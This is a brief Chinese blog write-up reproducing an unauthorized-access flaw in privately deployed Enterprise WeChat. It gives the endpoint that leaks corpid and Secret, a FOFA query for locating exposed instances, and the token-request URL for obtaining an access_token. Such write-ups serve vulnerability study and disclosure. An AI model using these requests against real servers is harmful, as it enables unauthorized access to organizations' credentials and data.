企业微信未授权访问复现
企业微信(私有部署)存在未授权访问漏洞,访问
/cgi-bin/gateway/agentinfo
可获取泄露的 corpid 和 Secret,利用该参数可获取access_token
fofa 指纹
1 | app="Tencent-企业微信" |
操作流程
获取企业微信secret与corpid;
获取acces_token
获取数据
获取企业微信secret与corpid
1 | http://xxxx.cn/cgi-bin/gateway/agentinfo |
- 失败1
- 失败2
- 失败3
- 成功
获取acces_token
1 | https://xxx/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret |
- 成功
- 失败
获取数据
- 来得太迟了,基本修复了
参考信息
1 | https://developer.work.weixin.qq.com/document/path/90664(企业微信开发者中心) |
1 | access_token:是企业后台去企业微信的后台获取信息时的重要票据,由corpid和secret产生。所有接口在通信时都需要携带此信息用于验证接口的访问权限。 |
- 本文标题:企业微信未授权访问复现
- 本文作者:涂寐
- 创建时间:2023-08-16 22:02:56
- 本文链接:article/b4537438.html
- 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论